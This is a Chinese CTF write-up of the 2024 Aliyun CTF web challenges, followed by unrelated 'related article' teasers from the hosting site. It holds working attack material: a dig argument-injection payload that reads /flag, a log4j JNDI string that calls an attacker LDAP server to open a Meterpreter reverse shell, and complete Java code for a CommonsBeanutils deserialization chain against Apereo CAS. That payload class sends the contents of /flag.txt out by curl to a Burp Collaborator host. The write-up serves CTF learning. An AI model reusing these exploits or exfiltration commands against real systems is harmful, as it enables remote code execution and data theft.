2024阿里云CTF Web writeup

《Java代码审计》icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect

前言

又是周末比赛,希望以后的CTF组织者都搞到周中 这样在公司上班就能打比赛,不过这次也是随缘参与。这次web题目难度还行,其他的题目没怎么做。所以还是只写web的题目了,记录下。

题目

web签到

图片

一看就是查询dns的,抓包:

图片

很有可能是dig命令,最终将结果base64返回并输出,探测了很长时间domain发现过滤的非常严格。后续在type处注入,有大量的字符转义。翻阅dig参数 有一个-f读取文件,直接读根目录flag

{"domain":"baidu.com","type":"-f/flag"}

easyCAS

解法1

username处存在log4j,使用burp自带的dnslog探测确实存在。使用JNDIExploit 直接利用tomcatbypass模块反弹shell到metepreter:

先开启ldap

java -jar JNDIExploit-1.4-SNAPSHOT.jar --ip xxx.xxx.xxx.xxx--ldapPort 8881

再发送请求

username=${jndi:ldap://1.1.1.1:8881/TomcatBypass/Meterpreter/1.1.1.1/8884}

图片

标准解法

我猜测这个可能是官方想要的考点,否则log4j打太无脑了。

查阅资料发现默认的用户名是 casuser,密码是 Mellon

http://web3.aliyunctf.com:23723//login?service=http%3A%2F%2Fweb3.aliyunctf.com%3A23723%2Fstatus%2Fheapdump

通过上述链接下载heapdump。直接去访问直接跳转127.0.0.1了。

我们先分析题目,说的是5.x以后就没有问题了吗?我们都知道4.x有反序列化的问题,类似shiro有默认key,直接打反序列化的gadgets。现在5.x的key不是默认了,但是我们有heapdump,IDEA打开查询对应可以:

org.apereo.cas.util.cipher.WebflowConversationStateCipherExecutor

先写一个危险类执行命令,test.class:

  • package aliyunCTF_Easy_Cas; import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.util.Base64;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader; public class test extends AbstractTranslet { public test() throws IOException { super(); String result = execCommand("cat /flag.txt").trim(); String command = "curl "+Base64.getEncoder().encodeToString(result.getBytes()).replaceAll("=+$", "") +".244uevo5icza8bg0mu6m4krtekki87.burpcollaborator.net"; execCommand(command); //Runtime.getRuntime().exec("bash -c 'curl `whoami`.jwjb6cgmatrr0s8heby3w1ja61cw0l.burpcollaborator.net'"); } @Override public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } private static String execCommand(String command) throws IOException { StringBuffer output = new StringBuffer(); Process process = Runtime.getRuntime().exec(command); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { output.append(line + "\n"); } return output.toString(); }}

然后我们结合CB1NOCC反序列化链,构造一个反序列化并利用上面拿到的key加密(直接看网上的分析文章把加密部分扒了过来组合)。

package aliyunCTF_Easy_Cas;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xml.internal.serialize.Serializer;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import javassist.CannotCompileException;import javassist.ClassPool;import javassist.CtClass;import javassist.NotFoundException;import org.apereo.cas.util.cipher.WebflowConversationStateCipherExecutor;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.Base64;import java.util.PriorityQueue;import java.util.zip.GZIPOutputStream;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.commons.beanutils.BeanComparator;
import javax.crypto.spec.SecretKeySpec;
public class attackAeperoCas {
    public static void setFieldValue(Object obj, String filedname, Object value) throws Exception{        Field field = obj.getClass().getDeclaredField(filedname);        field.setAccessible(true);        field.set(obj, value);    }
    public static void main(String[] args) throws Exception {
        // 构造CB1nocc链接        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(test.class.getName());        byte[] code = clazz.toBytecode();        TemplatesImpl ti =new TemplatesImpl();        setFieldValue(ti,"_bytecodes",new byte[][]{code});        setFieldValue(ti, "_name", "eval");        final BeanComparator bc = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);        final PriorityQueue<Object> pq = new PriorityQueue<Object>(2,bc);        pq.add("1");        pq.add("1");        setFieldValue(bc,"property","outputProperties");        setFieldValue(pq,"queue",new Object[]{ti,ti});        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(pq);        oos.close();
        //加密payload        byte[] skey = "CdsZkifxK9MfH9v0CJ-DJoEvJ3wPMNqUZ8AKoYFLSCwiQ4PGtuh90rN7-QzyaLdALxO3ZtNfgX_de7Pm7kd0Zg".getBytes();        byte[] ekey = new byte[]{56,62,-30,-91,93,25,105,-71,-92,-30,110,45,-27,44,89,-36};        SecretKeySpec enkey = new SecretKeySpec(ekey, "AES");        WebflowConversationStateCipherExecutor webflowConversationStateCipherExecutor = new WebflowConversationStateCipherExecutor(new String(ekey), new String(skey), "AES", 512, 16);
        //这里用setfield 因为setfield我们编写类可以设置父类的属性        setfield(webflowConversationStateCipherExecutor, "encryptionKey", enkey);
        System.out.println(Base64.getEncoder().encodeToString(webflowConversationStateCipherExecutor.encode(compressString(barr.toByteArray()))));    }    public static byte[] compressString(byte[] data) {        // 使用ByteArrayOutputStream来捕获压缩数据        try (ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);             GZIPOutputStream gzipOS = new GZIPOutputStream(bos)) {            // 写入数据到GZIPOutputStream,它会处理压缩            gzipOS.write(data);            // 完成压缩数据的写入            gzipOS.close();            // 返回压缩后的字节数组            return bos.toByteArray();        } catch (IOException e) {            e.printStackTrace();            return null;        }    }    //得遍历父类设置对应属性。因为encryptionKey属于webflowConversationStateCipherExecutor父类的属性。    static public void setfield(Object targetObject, String fieldName, Object newValue) throws NoSuchFieldException {        try {            // 获取目标对象的类对象            Class<?> currentClass = targetObject.getClass();
            // 循环遍历当前类及其父类,直到找到该字段或到达Object类            Field field = null;            while (currentClass != null) {                try {                    field = currentClass.getDeclaredField(fieldName);                    break; // 字段找到,退出循环                } catch (NoSuchFieldException e) {                    // 当前类中没有该字段,继续在父类中查找                    currentClass = currentClass.getSuperclass();                }            }            if (field == null) {                throw new NoSuchFieldException("Field " + fieldName + " not found in class hierarchy");            }            // 设置访问权限,允许访问私有字段            field.setAccessible(true);            // 设置新的字段值            field.set(targetObject, newValue);
        } catch (IllegalAccessException e) {            e.printStackTrace();        }    }
}

加密的payload直接替换execution参数。注意前面的uid不要去掉,从uid_后开始替换。我这里是直接DNS携带flag,执行的就是test.class中编写的代码。

图片

这样可能才是这次考点,但是没想到这个环境有log4j直接就RCE了。

重点:CB1NOCC + 加密流程

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/58511.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

机柜的通用技术要求

通用技术要求机柜的各项技术标准均遵循国家技术监督局的相关标准和技术规范&#xff0c;各项指标&#xff08;包含但不限定于上述&#xff09;均符合国家相关标准。机柜柜体应采用优质冷轧钢板或进口卷板(★需提供厂家证明)&#xff1b;所采用的材料、紧固件、密封件&#xff0…

Bartender 5 for Mac 菜单栏管理软件 安装教程【保姆级教程,操作简单小白轻松上手使用】

Mac分享吧 文章目录 Bartender 5 for Mac 菜单栏管理软件 安装完成&#xff0c;软件打开效果一、Bartender 5 菜单栏管理软件 Mac电脑版——v5.2.3⚠️注意事项&#xff1a;1️⃣&#xff1a;下载软件2️⃣&#xff1a;安装软件3️⃣&#xff1a;打开软件&#xff0c;根据自己…

职场逆袭!学会管理上司,你也能成为职场赢家

书友们&#xff0c;不要错过了&#xff01;我挖到了一本真正让我彻夜难眠的小说&#xff0c;情节跌宕起伏&#xff0c;角色鲜活得就像从书里跳出来陪你聊天。每一页都是新的惊喜&#xff0c;绝对让你欲罢不能。要是你也在寻找那种让人上瘾的阅读体验&#xff0c;这本书就是你的…

Actor-Critic方法【A2C,A3C,Policy Gradient】

强化学习笔记系列目录 第一章 强化学习基本概念 第二章 贝尔曼方程 第三章 贝尔曼最优方程 第四章 值迭代和策略迭代 第五章 强化学习实例分析:GridWorld 第六章 蒙特卡洛方法 第七章 Robbins-Monro算法 第八章 多臂老虎机 第九章 强化学习实例分析:CartPole 第十章 时序差分法…

儿童自闭症康复:找到孩子的微小进步,看见希望

在广州市从化区的宁静一隅&#xff0c;有两所特别的学校——星贝育园康复中心的江埔校区和太平校区&#xff0c;它们如同两盏温暖的灯塔&#xff0c;照亮了无数自闭症儿童及其家庭的康复之路。星贝育园&#xff0c;这个全国知名的广泛性发育障碍全托寄宿制儿童康复训练机构&…

kubevirt cloud-init配置

https://cloudinit.readthedocs.io/en/latest/reference/examples.html (示例) https://cloudinit.readthedocs.io/en/latest/reference/faq.html (常见问题) https://cloudinit.readthedocs.io/en/latest/howto/debug_user_data.html (检查user_data) https://clo…

若依管理系统使用已有 Nacos 部署流程整理

背景 玩了一下开源项目 RuoYi 管理系统Cloud 版&#xff0c;卡住的地方是&#xff1a;它用到了 nacos 配置管理&#xff0c;如果用的 nacos 环境是单机且是内置数据库的话&#xff0c;该怎么配置呢&#xff1f; 本文整理本机启动 RuoYi Cloud 应用本地部署的过程&#xff0c;…

数字信号处理-FPGA插入不同误码率的模拟源

module data_error_injector (input clk, // 时钟信号&#xff0c;50MHzinput reset, // 复位信号&#xff0c;高有效input DIN_EN, // 数据输入使能&#xff0c;高有效input [7:0] ERROR_LEVEL, // 错误等级…

对称二叉树(力扣101)

题目如下: 思路 对于这道题, 我会采用递归的解法. 看着对称的二叉树, 写下判断对称的条件, 再进入递归即可. 值得注意的是, 代码中会有两个函数, 第一个是isSymmetric,第二个是judge. 因为这里会考虑到一种特殊情况, 那就是 二叉树的根结点(最上面的那个),它会单独用…

山东布谷科技:关于直播源码|语音源码|一对一直播源码提交App Store的流程及重构建议

自从YY、六间房开启国内聊天室和秀场等网红盛行的网络红利时代以来&#xff0c;紧随其后国内各大音视频平台相应出现&#xff0c;先有映客花椒等直播平台的风头正劲&#xff0c;后有功能板块更丰富的头条抖音Tiktok等&#xff0c;盈利功能点不仅仅有直播PK连麦等礼物打赏功能&a…

k8s图形化显示(KRM)

在master节点 kubectl get po -n kube-system 这个命令会列出 kube-system 命名空间中的所有 Pod 的状态和相关信息&#xff0c;比如名称、状态、重启次数等。 systemctl status kubelet #查看kubelet状态 yum install git #下载git命令 git clone https://gitee.com/duk…

梧桐数据库SQL高级查询技巧之计算用户每月登录次数及其变化

在数据分析中&#xff0c;了解用户行为的变化趋势是至关重要的。例如&#xff0c;我们可能想知道用户每月登录次数的变化&#xff0c;以此来评估用户活跃度或预测流失率。本文将通过一个具体的 SQL 查询示例&#xff0c;展示如何计算每个用户在当前月份和前一个月的登录次数&am…

qgis加载获取远程wms数据失败

开发环境&#xff1a;VS2015 Qt5.11.2 QGis3.16.7 64位 Release 问题描述&#xff1a; 1、使用QGIS桌面程序创建工程文件&#xff08;通过wms加载远程图层&#xff09;&#xff0c;通过代码进行加载&#xff1b; 2、代码中加载qgis工程文件&#xff0c;无法显示wms数…

ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述&#xff1a; ‌ ArcGIS‌是一个综合的地理空间平台&#xff0c;由Esri开发&#xff0c;旨在为专业人士和组织提供全面的地理信息系统&#xff08;GIS&#xff09;功能。ArcGIS通过集成和连接地理环境中的数据&#xff0c;支持创建、管理、分析、映射和共享…

最全的Flutter中pubspec.yaml及其yaml 语法的使用说明

前言 我们知道在Flutter项目中&#xff0c;依赖版本管理是通过pubspec.yaml的形式&#xff0c;因此了解yaml的一些简单语法和如何配置使用pubspec.yaml 也是相当的重要&#xff0c;下文会对yaml的使用进行简单介绍 什么是yaml YAML&#xff08;YAML Ain’t Markup Language&a…

【Rust实现命令模式】

Rust实现命令模式 什么是命令模式命令模式的应用场景命令模式的在Rust中的关系图Rust中的命令模式代码示例运行结果总结 什么是命令模式 命令模式,即通过统一接口,如C#interface,亦或C中的抽象类的0方法,通过定义统一的接口,在定义不同的对象,为之接口实现具体的方法逻辑,再通…

golang 结构体作为形参传参

在 Go 中&#xff0c;BannerModel{} 这种写法是创建一个 BannerModel 结构体的实例&#xff08;空实例&#xff09;。这里有几个关键点需要理解&#xff1a; 基本语法解释&#xff1a; // 定义结构体 type BannerModel struct {ID intName string// ... 其他字段 }// 创建实…

使用UDP协议传输视频流!(分片、缓存)

背景 最近在开发工作中遇到需要两台本地设备之间进行视频流的传输的情况。但是团队一来没有这方面的专业人才&#xff0c;二来视频流的传续数据量很大&#xff0c;针对TCP和UDP的具体选择也不明确。 本文是在上诉背景之下进行的研究和开发工作。 目录 背景 UDP和TCP协议的…

【学术论文投稿】React全攻略:构建高性能前端应用的黄金法则

第六届国际科技创新学术交流大会暨管理科学信息化与经济创新发展学术会议&#xff08;MSIEID 2024&#xff09;_艾思科蓝_学术一站式服务平台 更多学术会议论文投稿请看&#xff1a;https://ais.cn/u/nuyAF3 目录 引言 1. React简介 2. React的三大核心概念 2.1 JSX 2.2…

鸿蒙应用App测试-专项测试(DevEco Testing)

注意&#xff1a;大家记得先学通用测试在学专项测试 鸿蒙应用App测试-通用测试-CSDN博客 注意&#xff1a;博主有个鸿蒙专栏&#xff0c;里面从上到下有关于鸿蒙next的教学文档&#xff0c;大家感兴趣可以学习下 如果大家觉得博主文章写的好的话&#xff0c;可以点下关注&am…